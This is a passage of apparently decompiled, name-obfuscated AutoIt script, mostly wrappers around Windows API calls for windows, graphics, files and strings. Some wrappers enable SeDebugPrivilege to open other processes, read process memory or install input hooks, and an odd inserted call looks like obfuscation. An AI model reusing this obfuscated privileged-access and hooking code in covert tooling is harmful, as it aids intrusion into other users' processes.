  1436. RETURN DLLSTRUCTGETDATA($Local004E , 1 )
  1437. ENDFUNC
  1438.  
  1439. Func Fn008E($ArgOpt00=1)
  1440. LOCAL $Var0151
  1441. SWITCH $ArgOpt00
  1442. CASE 1
  1443. $Var0151 = 0
  1444. CASE 2
  1445. $Var0151 =0x0010
  1446. CASE 3
  1447. $Var0151 =0x0020
  1448. CASE 4
  1449. $Var0151 =0x0030
  1450. CASE 5
  1451. $Var0151 =0x0040
  1452. CASE ELSE
  1453. $Var0151 =- 1
  1454. ENDSWITCH
  1455. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"MessageBeep","uint" ,$Var0151 )
  1456. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1457. RETURN $Local000E [ 0 ]
  1458. ENDFUNC
  1459.  
  1460. Func Fn008F($Arg00,$Arg01,$Arg02)
  1461. BLOCKINPUT( 0 )
  1462. MSGBOX($Arg00,$Arg01,$Arg02&" " )
  1463. ENDFUNC
  1464.  
  1465. Func Fn0090($Arg00,$ArgOpt01=0,$ArgOpt02=0,$ArgOpt03=0,$ArgOpt04=0)
  1466. DLLCALL("user32.dll","none" ,"mouse_event","dword" ,$Arg00,"dword" ,$ArgOpt01,"dword" ,$ArgOpt02,"dword" ,$ArgOpt03,"ulong_ptr" ,$ArgOpt04)
  1467. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED)
  1468. ENDFUNC
  1469.  
  1470. Func Fn0091($Arg00,$Arg01,$Arg02)
  1471. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"bool" ,"MoveToEx" ,"handle" ,$Arg00,"int" ,$Arg01,"int" ,$Arg02,"ptr" , 0 )
  1472. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1473. RETURN $Local000E [ 0 ]
  1474. ENDFUNC
  1475.  
  1476. Func Fn0092($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$ArgOpt05=TRUE )
  1477. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"MoveWindow","hwnd" ,$Arg00,"int" ,$Arg01,"int" ,$Arg02,"int" ,$Arg03,"int" ,$Arg04,"bool" ,$ArgOpt05)
  1478. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1479. RETURN $Local000E [ 0 ]
  1480. ENDFUNC
  1481.  
  1482. Func Fn0093($Arg00,$Arg01,$Arg02)
  1483. LOCAL $Local000E =DLLCALL("kernel32.dll","int" ,"MulDiv" ,"int" ,$Arg00,"int" ,$Arg01,"int" ,$Arg02)
  1484. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
  1485. RETURN $Local000E [ 0 ]
  1486. ENDFUNC
  1487.  
  1488. Func Fn0094($Arg00,$ArgOpt01=0,$ArgOpt02=0,$ArgOpt03=FALSE )
  1489. LOCAL $Local0050 ="str"
  1490. IF NOT ISSTRING($Arg00)THEN $Local0050 ="struct*"
  1491. LOCAL $Local000E =DLLCALL("kernel32.dll","int" ,"MultiByteToWideChar","uint" ,$ArgOpt01,"dword" ,$ArgOpt02,$Local0050 ,$Arg00,"int" ,- 1 ,"ptr" , 0 ,"int" , 0 )
  1492. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1493. LOCAL $Local0051 =$Local000E [ 0 ]
  1494. LOCAL $Local0052 =DLLSTRUCTCREATE("wchar[" &$Local0051 &"]" )
  1495. $Local000E =DLLCALL("kernel32.dll","int" ,"MultiByteToWideChar","uint" ,$ArgOpt01,"dword" ,$ArgOpt02,$Local0050 ,$Arg00,"int" ,- 1 ,"struct*" ,$Local0052 ,"int" ,$Local0051 )
  1496. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1497. IF $ArgOpt03 THEN RETURN DLLSTRUCTGETDATA($Local0052 , 1 )
  1498. RETURN $Local0052
  1499. ENDFUNC
  1500.  
  1501. Func Fn0095($Arg00,$Arg01,$ArgOpt02=0,$ArgOpt03=0)
  1502. LOCAL $Local000E =DLLCALL("kernel32.dll","int" ,"MultiByteToWideChar","uint" ,$ArgOpt02,"dword" ,$ArgOpt03,"STR" ,$Arg00,"int" ,- 1 ,"struct*" ,$Arg01,"int" ,(STRINGLEN($Arg00)+ 1 )* 2 )
  1503. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1504. RETURN $Local000E [ 0 ]
  1505. ENDFUNC
  1506.  
  1507. Func Fn0096($Arg00,$Arg01,$Arg02,$ArgOpt03=FALSE )
  1508. LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"OpenProcess","dword" ,$Arg00,"bool" ,$Arg01,"dword" ,$Arg02)
  1509. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1510. IF $Local000E [ 0 ]THEN RETURN $Local000E [ 0 ]
  1511. IF NOT $ArgOpt03 THEN RETURN 0
  1512. LOCAL $Local0001 =Fn0000(BITOR($Var0152 ,$Var0153 ))
  1513. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1514. Fn0001($Local0001 ,"SeDebugPrivilege",TRUE )
  1515. LOCAL $Local0053 =@ERROR
  1516. LOCAL $Local0054 =@EXTENDED
  1517. LOCAL $Local0055 = 0
  1518. IF NOT @ERROR THEN
  1519. $Local000E =DLLCALL("kernel32.dll","handle" ,"OpenProcess","dword" ,$Arg00,"bool" ,$Arg01,"dword" ,$Arg02)
  1520. $Local0053 =@ERROR
  1521. $Local0054 =@EXTENDED
  1522. IF $Local000E [ 0 ]THEN $Local0055 =$Local000E [ 0 ]
  1523. Fn0001($Local0001 ,"SeDebugPrivilege",FALSE )
  1524. IF @ERROR THEN
  1525. $Local0053 =@ERROR
  1526. $Local0054 =@EXTENDED
  1527. ENDIF
  1528. ENDIF
  1529. Fn000F($Local0001 )
  1530. RETURN SETERROR($Local0053 ,$Local0054 ,$Local0055 )
  1531. ENDFUNC
  1532.  
  1533. Func Fn0097($Arg00)
  1534. LOCAL $Local0034 [ 3 ]
  1535. $Local0034 [ 0 ]= 2
  1536. LOCAL $Local0056 =STRINGMID($Arg00, 1 ,STRINGINSTR($Arg00,"\" , 0 ,- 1 )- 1 )
  1537. $Local0034 [ 1 ]=$Local0056
  1538. $Local0034 [ 2 ]=STRINGMID($Arg00,STRINGINSTR($Arg00,"\" , 0 ,- 1 )+ 1 )
  1539. RETURN $Local0034
  1540. ENDFUNC
  1541.  
  1542. Func Fn0098(CONST $ArgC00,$ArgOpt01="",CONST $ArgCOpt02=@LF)
  1543. LOCAL $Local0057 = 0
  1544. IF ISSTRING($ArgOpt01)THEN
  1545. IF STRINGLEN($ArgOpt01)THEN
  1546. $ArgOpt01=STRINGSPLIT($ArgOpt01,$ArgCOpt02, 1 + 2 )
  1547. $Local0057 =UBOUND($ArgOpt01, 1 )
  1548. ENDIF
  1549. ELSEIF ISARRAY($ArgOpt01)THEN
  1550. $Local0057 =UBOUND($ArgOpt01)
  1551. ENDIF
  1552. LOCAL $Var0154 ,$Var0155
  1553. IF $Local0057 THEN
  1554. LOCAL $Local0058 =""
  1555. FOR $Var0156 IN $ArgOpt01
  1556. $Local0058 &="wchar[" &STRINGLEN($Var0156 )+ 1 &"];"
  1557. NEXT
  1558. $Var0154 =DLLSTRUCTCREATE($Local0058 )
  1559. $Var0155 =DLLSTRUCTCREATE("ptr[" &$Local0057 + 1 &"]" )
  1560. FOR $Local00EB = 1 TO $Local0057
  1561. DLLSTRUCTSETDATA($Var0154 ,$Local00EB ,$ArgOpt01[$Local00EB - 1 ])
  1562. DLLSTRUCTSETDATA($Var0155 , 1 ,DLLSTRUCTGETPTR($Var0154 ,$Local00EB ),$Local00EB )
  1563. NEXT
  1564. DLLSTRUCTSETDATA($Var0155 , 1 ,PTR( 0 ),$Local0057 + 1 )
  1565. ENDIF
  1566. LOCAL $Local000E =DLLCALL("shlwapi.dll","bool" ,"PathFindOnPathW","wstr" ,$ArgC00,"struct*" ,$Var0155 )
  1567. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1568. IF $Local000E [ 0 ]= 0 THEN RETURN SETERROR( 1 , 0 ,$ArgC00)
  1569. RETURN $Local000E [ 1 ]
  1570. ENDFUNC
  1571.  
  1572. Func Fn0099(BYREF $ArgRef00,$ArgOpt01=TRUE )
  1573. LOCAL $Local0059 =DLLSTRUCTGETDATA($ArgRef00,"Left" )
  1574. LOCAL $Local005A =DLLSTRUCTGETDATA($ArgRef00,"Top" )
  1575. LOCAL $Local005B =DLLSTRUCTGETDATA($ArgRef00,"Right" )
  1576. LOCAL $Local005C =DLLSTRUCTGETDATA($ArgRef00,"Bottom" )
  1577. IF $ArgOpt01 THEN
  1578. $Local0059 =$Local0059 +(($Local005B -$Local0059 )/ 2 )
  1579. $Local005A =$Local005A +(($Local005C -$Local005A )/ 2 )
  1580. ENDIF
  1581. LOCAL $Local0030 =DLLSTRUCTCREATE($Var010E )
  1582. DLLSTRUCTSETDATA($Local0030 ,"X" ,$Local0059 )
  1583. DLLSTRUCTSETDATA($Local0030 ,"Y" ,$Local005A )
  1584. RETURN $Local0030
  1585. ENDFUNC
  1586.  
  1587. Func Fn009A($Arg00,$Arg01,$Arg02,$Arg03)
  1588. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"PostMessage","hwnd" ,$Arg00,"uint" ,$Arg01,"wparam" ,$Arg02,"lparam" ,$Arg03)
  1589. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1590. RETURN $Local000E [ 0 ]
  1591. ENDFUNC
  1592.  
  1593. Func Fn009B($Arg00)
  1594. RETURN BITAND($Arg00,0x03FF )
  1595. ENDFUNC
  1596.  
  1597. Func Fn009C(BYREF $ArgRef00,BYREF $ArgRef01)
  1598. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"PtInRect" ,"struct*" ,$ArgRef00,"struct" ,$ArgRef01)
  1599. IF @ERROR THEN RETURN SETERROR( 1 ,@EXTENDED,FALSE )
  1600. RETURN NOT ($Local000E [ 0 ]= 0 )
  1601. ENDFUNC
  1602.  
  1603. Func Fn009D($Arg00,$Arg01,$Arg02,BYREF $ArgRef03,$ArgOpt04=0)
  1604. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"ReadFile" ,"handle" ,$Arg00,"ptr" ,$Arg01,"dword" ,$Arg02,"dword*" , 0 ,"ptr" ,$ArgOpt04)
  1605. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1606. $ArgRef03=$Local000E [ 4 ]
  1607. RETURN $Local000E [ 0 ]
  1608. ENDFUNC
  1609.  
  1610. Func Fn009E($Arg00,$Arg01,$Arg02,$Arg03,BYREF $ArgRef04)
  1611. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"ReadProcessMemory","handle" ,$Arg00,"ptr" ,$Arg01,"ptr" ,$Arg02,"ulong_ptr" ,$Arg03,"ulong_ptr*", 0 )
  1612. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1613. $ArgRef04=$Local000E [ 5 ]
  1614. RETURN $Local000E [ 0 ]
  1615. ENDFUNC
  1616.  
  1617. Func Fn009F(BYREF $ArgRef00)
  1618. RETURN (DLLSTRUCTGETDATA($ArgRef00,"Left" )= 0 )AND (DLLSTRUCTGETDATA($ArgRef00,"Top" )= 0 )AND (DLLSTRUCTGETDATA($ArgRef00,"Right" )= 0 )AND (DLLSTRUCTGETDATA($ArgRef00,"Bottom" )= 0 )
  1619. ENDFUNC
  1620.  
  1621. Func Fn00A0($Arg00,$ArgOpt01=0,$ArgOpt02=0,$ArgOpt03=5)
  1622. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"RedrawWindow","hwnd" ,$Arg00,"struct*" ,$ArgOpt01,"handle" ,$ArgOpt02,"uint" ,$ArgOpt03)
  1623. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1624. RETURN $Local000E [ 0 ]
  1625. ENDFUNC
  1626.  
  1627. Func Fn00A1($Arg00)
  1628. LOCAL $Local000E =DLLCALL("user32.dll","uint" ,"RegisterWindowMessageW","wstr" ,$Arg00)
  1629. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1630. RETURN $Local000E [ 0 ]
  1631. ENDFUNC
  1632.  
  1633. Func Fn00A2()
  1634. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"ReleaseCapture")
  1635. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1636. RETURN $Local000E [ 0 ]
  1637. ENDFUNC
  1638.  
  1639. Func Fn00A3($Arg00,$Arg01)
  1640. LOCAL $Local000E =DLLCALL("user32.dll","int" ,"ReleaseDC" ,"hwnd" ,$Arg00,"handle" ,$Arg01)
  1641. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1642. RETURN $Local000E [ 0 ]
  1643. ENDFUNC
  1644.  
  1645. Func Fn00A4($Arg00,BYREF $ArgRef01)
  1646. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"ScreenToClient","hwnd" ,$Arg00,"struct*" ,$ArgRef01)
  1647. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1648. RETURN $Local000E [ 0 ]
  1649. ENDFUNC
  1650.  
  1651. Func Fn00A5($Arg00,$Arg01)
  1652. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"SelectObject","handle" ,$Arg00,"handle" ,$Arg01)
  1653. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1654. RETURN $Local000E [ 0 ]
  1655. ENDFUNC
  1656.  
  1657. Func Fn00A6($Arg00,$Arg01)
  1658. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"INT" ,"SetBkColor","handle" ,$Arg00,"dword" ,$Arg01)
  1659. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
  1660. RETURN $Local000E [ 0 ]
  1661. ENDFUNC
  1662.  
  1663. Func Fn00A7($Arg00,$Arg01)
  1664. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"int" ,"SetBkMode" ,"handle" ,$Arg00,"int" ,$Arg01)
  1665. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1666. RETURN $Local000E [ 0 ]
  1667. ENDFUNC
  1668.  
  1669. Func Fn00A8($Arg00)
  1670. LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"SetCapture","hwnd" ,$Arg00)
  1671. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1672. RETURN $Local000E [ 0 ]
  1673. ENDFUNC
  1674.  
  1675. Func Fn00A9($Arg00)
  1676. LOCAL $Local000E =DLLCALL("user32.dll","handle" ,"SetCursor" ,"handle" ,$Arg00)
  1677. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1678. RETURN $Local000E [ 0 ]
  1679. ENDFUNC
  1680.  
  1681. Func Fn00AA($Arg00)
  1682. LOCAL $Local000E =DLLCALL("winspool.drv","bool" ,"SetDefaultPrinterW","wstr" ,$Arg00)
  1683. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1684. RETURN $Local000E [ 0 ]
  1685. ENDFUNC
  1686.  
  1687. Func Fn00AB($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05,$ArgOpt06=0)
  1688. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"int" ,"SetDIBits" ,"handle" ,$Arg00,"handle" ,$Arg01,"uint" ,$Arg02,"uint" ,$Arg03,"ptr" ,$Arg04,"ptr" ,$Arg05,"uint" ,$ArgOpt06)
  1689. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1690. RETURN $Local000E [ 0 ]
  1691. ENDFUNC
  1692.  
  1693. Func Fn00AC($Arg00)
  1694. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"SetEndOfFile","handle" ,$Arg00)
  1695. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1696. RETURN $Local000E [ 0 ]
  1697. ENDFUNC
  1698.  
  1699. Func Fn00AD($Arg00)
  1700. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"SetEvent" ,"handle" ,$Arg00)
  1701. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1702. RETURN $Local000E [ 0 ]
  1703. ENDFUNC
  1704.  
  1705. Func Fn00AE($Arg00,$Arg01,$ArgOpt02=0)
  1706. LOCAL $Local000E =DLLCALL("kernel32.dll","INT" ,"SetFilePointer","handle" ,$Arg00,"long" ,$Arg01,"ptr" , 0 ,"long" ,$ArgOpt02)
  1707. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
  1708. RETURN $Local000E [ 0 ]
  1709. ENDFUNC
  1710.  
  1711. Func Fn00AF($Arg00)
  1712. LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"SetFocus" ,"hwnd" ,$Arg00)
  1713. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1714. RETURN $Local000E [ 0 ]
  1715. ENDFUNC
  1716.  
  1717. Func Fn00B0($Arg00,$Arg01,$ArgOpt02=TRUE )
  1718. Fn0006($Arg00,$Var0027 ,$Arg01,$ArgOpt02, 0 ,"hwnd" )
  1719. ENDFUNC
  1720.  
  1721. Func Fn00B1($Arg00,$Arg01,$Arg02)
  1722. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"SetHandleInformation","handle" ,$Arg00,"dword" ,$Arg01,"dword" ,$Arg02)
  1723. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1724. RETURN $Local000E [ 0 ]
  1725. ENDFUNC
  1726.  
  1727. Func Fn00B2($Arg00,$Arg01,$ArgOpt02=255,$ArgOpt03=3,$ArgOpt04=FALSE )
  1728. IF $ArgOpt03=DEFAULT OR $ArgOpt03="" OR $ArgOpt03< 0 THEN $ArgOpt03= 3
  1729. IF NOT $ArgOpt04 THEN
  1730. $Arg01=INT(BINARYMID($Arg01, 3 , 1 )&BINARYMID($Arg01, 2 , 1 )&BINARYMID($Arg01, 1 , 1 ))
  1731. ENDIF
  1732. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"SetLayeredWindowAttributes","hwnd" ,$Arg00,"dword" ,$Arg01,"byte" ,$ArgOpt02,"dword" ,$ArgOpt03)
  1733. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1734. RETURN $Local000E [ 0 ]
  1735. ENDFUNC
  1736.  
  1737. Func Fn00B3($Arg00,$Arg01)
  1738. LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"SetParent" ,"hwnd" ,$Arg00,"hwnd" ,$Arg01)
  1739. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1740. RETURN $Local000E [ 0 ]
  1741. ENDFUNC
  1742.  
  1743. Func Fn00B4($Arg00,$Arg01)
  1744. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"SetProcessAffinityMask","handle" ,$Arg00,"ulong_ptr" ,$Arg01)
  1745. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1746. RETURN $Local000E [ 0 ]
  1747. ENDFUNC
  1748.  
  1749. Func Fn00B5($Arg00,$Arg01)
  1750. LOCAL $Local005D =ISARRAY($Arg00),$Var0157 =ISARRAY($Arg01)
  1751. LOCAL $Var0158
  1752. IF NOT $Var0157 AND NOT $Local005D THEN
  1753. $Var0158 = 1
  1754. ELSEIF $Var0157 OR $Local005D THEN
  1755. IF NOT $Var0157 OR NOT $Local005D THEN RETURN SETERROR(- 1 ,- 1 ,FALSE )
  1756. IF UBOUND($Arg00)<>UBOUND($Arg01)THEN RETURN SETERROR(- 1 ,- 1 ,FALSE )
  1757. $Var0158 =UBOUND($Arg00)
  1758. ENDIF
  1759. LOCAL $Local005E =DLLSTRUCTCREATE("int Element["&$Var0158 &"]" )
  1760. LOCAL $Local005F =DLLSTRUCTCREATE("dword NewColor["&$Var0158 &"]" )
  1761. IF NOT $Local005D THEN
  1762. DLLSTRUCTSETDATA($Local005E ,"Element" ,$Arg00, 1 )
  1763. ELSE
  1764. FOR $Var0149 = 0 TO $Var0158 - 1
  1765. DLLSTRUCTSETDATA($Local005E ,"Element" ,$Arg00[$Var0149 ],$Var0149 + 1 )
  1766. NEXT
  1767. ENDIF
  1768. IF NOT $Var0157 THEN
  1769. DLLSTRUCTSETDATA($Local005F ,"NewColor" ,$Arg01, 1 )
  1770. ELSE
  1771. FOR $Var0149 = 0 TO $Var0158 - 1
  1772. DLLSTRUCTSETDATA($Local005F ,"NewColor" ,$Arg01[$Var0149 ],$Var0149 + 1 )
  1773. NEXT
  1774. ENDIF
  1775. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"SetSysColors","int" ,$Var0158 ,"struct*" ,$Local005E ,"struct*" ,$Local005F )
  1776. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1777. RETURN $Local000E [ 0 ]
  1778. ENDFUNC
  1779.  
  1780. Func Fn00B6($Arg00,$Arg01)
  1781. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"INT" ,"SetTextColor","handle" ,$Arg00,"dword" ,$Arg01)
  1782. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
  1783. RETURN $Local000E [ 0 ]
  1784. ENDFUNC
  1785.  
  1786. Func Fn00B7($Arg00,$Arg01,$Arg02)
  1787. A5100705641( 0 )
  1788. LOCAL $Local0042 ="SetWindowLongW"
  1789. IF @AutoItX64 THEN $Local0042 ="SetWindowLongPtrW"
  1790. LOCAL $Local000E =DLLCALL("user32.dll","long_ptr" ,$Local0042 ,"hwnd" ,$Arg00,"int" ,$Arg01,"long_ptr" ,$Arg02)
  1791. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1792. RETURN $Local000E [ 0 ]
  1793. ENDFUNC
  1794.  
  1795. Func Fn00B8($Arg00,$Arg01)
  1796. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"SetWindowPlacement","hwnd" ,$Arg00,"ptr" ,$Arg01)
  1797. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1798. RETURN $Local000E [ 0 ]
  1799. ENDFUNC
  1800.  
  1801. Func Fn00B9($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05,$Arg06)
  1802. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"SetWindowPos","hwnd" ,$Arg00,"hwnd" ,$Arg01,"int" ,$Arg02,"int" ,$Arg03,"int" ,$Arg04,"int" ,$Arg05,"uint" ,$Arg06)
  1803. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1804. RETURN $Local000E [ 0 ]
  1805. ENDFUNC
  1806.  
  1807. Func Fn00BA($Arg00,$Arg01,$ArgOpt02=TRUE )
  1808. LOCAL $Local000E =DLLCALL("user32.dll","int" ,"SetWindowRgn","hwnd" ,$Arg00,"handle" ,$Arg01,"bool" ,$ArgOpt02)
  1809. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1810. RETURN $Local000E [ 0 ]
  1811. ENDFUNC
  1812.  
  1813. Func Fn00BB($Arg00,$Arg01,$Arg02,$ArgOpt03=0)
  1814. LOCAL $Local000E =DLLCALL("user32.dll","handle" ,"SetWindowsHookEx","int" ,$Arg00,"ptr" ,$Arg01,"handle" ,$Arg02,"dword" ,$ArgOpt03)
  1815. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1816. RETURN $Local000E [ 0 ]
  1817. ENDFUNC
  1818.  
  1819. Func Fn00BC($Arg00,$Arg01)
  1820. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"SetWindowTextW","hwnd" ,$Arg00,"wstr" ,$Arg01)
  1821. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1822. RETURN $Local000E [ 0 ]
  1823. ENDFUNC
  1824.  
  1825. Func Fn00BD($Arg00)
  1826. LOCAL $Local000E =DLLCALL("user32.dll","int" ,"ShowCursor","bool" ,$Arg00)
  1827. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1828. RETURN $Local000E [ 0 ]
  1829. ENDFUNC
  1830.  
  1831. Func Fn00BE($Arg00,$ArgOpt01=TRUE )
  1832. Fn008F(0x00041010 ,"Error" ,$Arg00)
  1833. IF $ArgOpt01 THEN EXIT
  1834. ENDFUNC
  1835.  
  1836. Func Fn00BF($Arg00)
  1837. Fn008F(0x0040 +0x1000 ,"Information",$Arg00)
  1838. ENDFUNC
  1839.  
  1840. Func Fn00C0($Arg00,$ArgOpt01=5)
  1841. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"ShowWindow","hwnd" ,$Arg00,"int" ,$ArgOpt01)
  1842. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1843. RETURN $Local000E [ 0 ]
  1844. ENDFUNC
  1845.  
  1846. Func Fn00C1($Arg00)
  1847. LOCAL $Local000E =DLLCALL("ole32.dll" ,"int" ,"StringFromGUID2","struct*" ,$Arg00,"wstr" ,"","int" ,0x0028 )
  1848. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  1849. RETURN SETEXTENDED($Local000E [ 0 ],$Local000E [ 2 ])
  1850. ENDFUNC
  1851.  
  1852. Func Fn00C2($Arg00)
  1853. LOCAL $Local0000 =DLLCALL("kernel32.dll","int" ,"lstrlenA" ,"struct*" ,$Arg00)
  1854. IF @ERROR THEN RETURN SETERROR( 1 ,@EXTENDED, 0 )
  1855. RETURN $Local0000 [ 0 ]
  1856. ENDFUNC
  1857.  
  1858. Func Fn00C3($Arg00)
  1859. LOCAL $Local0000 =DLLCALL("kernel32.dll","int" ,"lstrlenW" ,"struct*" ,$Arg00)
  1860. IF @ERROR THEN RETURN SETERROR( 1 ,@EXTENDED, 0 )
  1861. RETURN $Local0000 [ 0 ]
  1862. ENDFUNC
  1863.  
  1864. Func Fn00C4($Arg00)
  1865. RETURN BITSHIFT($Arg00, 10 )
  1866. ENDFUNC
  1867.  
  1868. Func Fn00C5($Arg00,$ArgOpt01=0,$ArgOpt02=0,$ArgOpt03=0)
  1869. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"SystemParametersInfoW","uint" ,$Arg00,"uint" ,$ArgOpt01,"ptr" ,$ArgOpt02,"uint" ,$ArgOpt03)
  1870. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1871. RETURN $Local000E [ 0 ]
  1872. ENDFUNC
  1873.  
  1874. Func Fn00C6()
  1875. LOCAL $Local007E ,$Var0159
  1876. $Local007E =Fn004E( 0 )
  1877. $Var0159 =0x05A0 /Fn0050($Local007E ,$Var0037 )
  1878. Fn00A3( 0 ,$Local007E )
  1879. RETURN $Var0159
  1880. ENDFUNC
  1881.  
  1882. Func Fn00C7()
  1883. LOCAL $Local007E ,$Var015A
  1884. $Local007E =Fn004E( 0 )
  1885. $Var015A =0x05A0 /Fn0050($Local007E ,$Var0039 )
  1886. Fn00A3( 0 ,$Local007E )
  1887. RETURN $Var015A
  1888. ENDFUNC
  1889.  
  1890. Func Fn00C8($Arg00)
  1891. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"UnhookWindowsHookEx","handle" ,$Arg00)
  1892. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1893. RETURN $Local000E [ 0 ]
  1894. ENDFUNC
  1895.  
  1896. Func Fn00C9($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05,$Arg06,$Arg07,$Arg08)
  1897. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"UpdateLayeredWindow","hwnd" ,$Arg00,"handle" ,$Arg01,"ptr" ,$Arg02,"ptr" ,$Arg03,"handle" ,$Arg04,"ptr" ,$Arg05,"dword" ,$Arg06,"ptr" ,$Arg07,"dword" ,$Arg08)
  1898. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1899. RETURN $Local000E [ 0 ]
  1900. ENDFUNC
  1901.  
  1902. Func Fn00CA($Arg00)
  1903. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"UpdateWindow","hwnd" ,$Arg00)
  1904. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1905. RETURN $Local000E [ 0 ]
  1906. ENDFUNC
  1907.  
  1908. Func Fn00CB($Arg00,$ArgOpt01=-1)
  1909. LOCAL $Local000E =DLLCALL("user32.dll","dword" ,"WaitForInputIdle","handle" ,$Arg00,"dword" ,$ArgOpt01)
  1910. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1911. RETURN $Local000E [ 0 ]
  1912. ENDFUNC
  1913.  
  1914. Func Fn00CC($Arg00,$Arg01,$ArgOpt02=FALSE ,$ArgOpt03=-1)
  1915. LOCAL $Local000E =DLLCALL("kernel32.dll","INT" ,"WaitForMultipleObjects","dword" ,$Arg00,"ptr" ,$Arg01,"bool" ,$ArgOpt02,"dword" ,$ArgOpt03)
  1916. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
  1917. RETURN $Local000E [ 0 ]
  1918. ENDFUNC
  1919.  
  1920. Func Fn00CD($Arg00,$ArgOpt01=-1)
